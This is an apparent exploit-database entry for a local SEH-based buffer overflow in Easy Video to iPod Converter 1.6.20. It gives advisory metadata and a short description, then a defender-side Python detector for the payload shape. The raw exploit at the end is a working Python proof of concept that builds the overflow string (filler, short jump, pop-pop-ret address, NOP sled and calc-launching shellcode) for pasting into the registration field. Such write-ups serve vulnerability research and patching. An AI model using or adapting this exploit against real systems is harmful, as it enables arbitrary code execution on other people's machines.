Vendor: Easy Video to iPod Converter
By: Nawaf Alkeraithe
CVSS: 7.8 (HIGH)
Type: Buffer Overflow
CWE: 119
Product Name: Easy Video to iPod Converter
Affected Version From: 1.6.20
Affected Version To: 1.6.20
Patch Exists: Yes
Related CWE: N/A
CPE: a:divxtodvd:easy_video_to_ipod_converter
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows XP SP3 x86
2019

Easy Video to iPod Converter – Local Buffer Overflow (SEH)

Easy Video to iPod Converter is vulnerable to a local SEH-based buffer overflow. By entering a specially crafted payload into the 'Enter User Name' field, an attacker can execute arbitrary code on the vulnerable system. The payload consists of 996 A's, followed by a jump instruction, a pop pop ret address, 20 NOPs, and shellcode.

Mitigation:

Update to the latest version of Easy Video to iPod Converter.
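
A defender-side check for the payload layout described above (long filler, a short jump in the next-SEH slot, a 4-byte handler pointer, then a NOP sled), usable for triaging crash inputs or captured field values. This is an added example, not part of the original advisory or exploit; the thresholds, function names and sample bytes are constructed assumptions.

```python
import re

# Assumed, tunable thresholds (not taken from the advisory).
MIN_FILLER = 256   # minimum run of one repeated byte before the SEH record
MIN_SLED = 8       # minimum NOP sled length after the handler pointer

# Next-SEH slot holding a short forward jump (EB xx) padded with two NOPs,
# then the 4-byte handler pointer, then a NOP sled.
SEH_RECORD = re.compile(
    rb"(?:\xEB[\x00-\x7F]\x90\x90|\x90\x90\xEB[\x00-\x7F])"
    rb"(.{4})"
    rb"(\x90{%d,})" % MIN_SLED,
    re.DOTALL,
)

def filler_run(data, end):
    """Length of the run of one repeated byte ending just before offset `end`."""
    start = end
    while start > 0 and data[start - 1] == data[end - 1]:
        start -= 1
    return end - start

def find_seh_overwrite(data, min_filler=MIN_FILLER):
    """Return one finding per SEH-overwrite-shaped record preceded by long filler."""
    findings = []
    for m in SEH_RECORD.finditer(data):
        run = filler_run(data, m.start()) if m.start() else 0
        if run >= min_filler:
            findings.append({
                "nseh_offset": m.start(),
                "filler_len": run,
                "handler": int.from_bytes(m.group(1), "little"),
                "sled_len": len(m.group(2)),
            })
    return findings

# Constructed sample: same layout as the description, with a placeholder
# handler pointer and INT3 bytes standing in for any code.
SAMPLE = (b"A" * 996 + b"\xEB\x06\x90\x90" + b"\xDE\xC0\xAD\x0B"
          + b"\x90" * 20 + b"\xCC" * 16)

if __name__ == "__main__":
    for f in find_seh_overwrite(SAMPLE):
        print("suspicious input: nSEH at %d, filler %d, handler 0x%08X, sled %d"
              % (f["nseh_offset"], f["filler_len"], f["handler"], f["sled_len"]))
```
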

Exploit-DB raw data:

# Exploit Title: Easy Video to iPod Converter - Local Buffer Overflow (SEH)
# Date: 2019-01-26
# Exploit Author: Nawaf Alkeraithe
# Twitter: @Alkeraithe1
# Vulnerable Software: Easy Video to iPod Converter 1.6.20
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.6.20 
# Software Link: http://www.divxtodvd.net/easy_video_to_ipod.exe
# Tested Windows XP SP3 x86

# PoC Steps
#1- run the program
#2- click on "Register"
#3- In the "Enter User Name" field, paste the content of the payload, and click "OK"


junk = "A"*996
jmp = "\xEB\x06\x90\x90"
popPopRetAddr = "\x11\x7B\x03\x10"
NOPs = "\x90"*20
shellCode = "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"

payload = junk + jmp + popPopRetAddr + NOPs + shellCode

exploitText = open("exploit.txt","w")
exploitText.write(payload)
exploitText.close()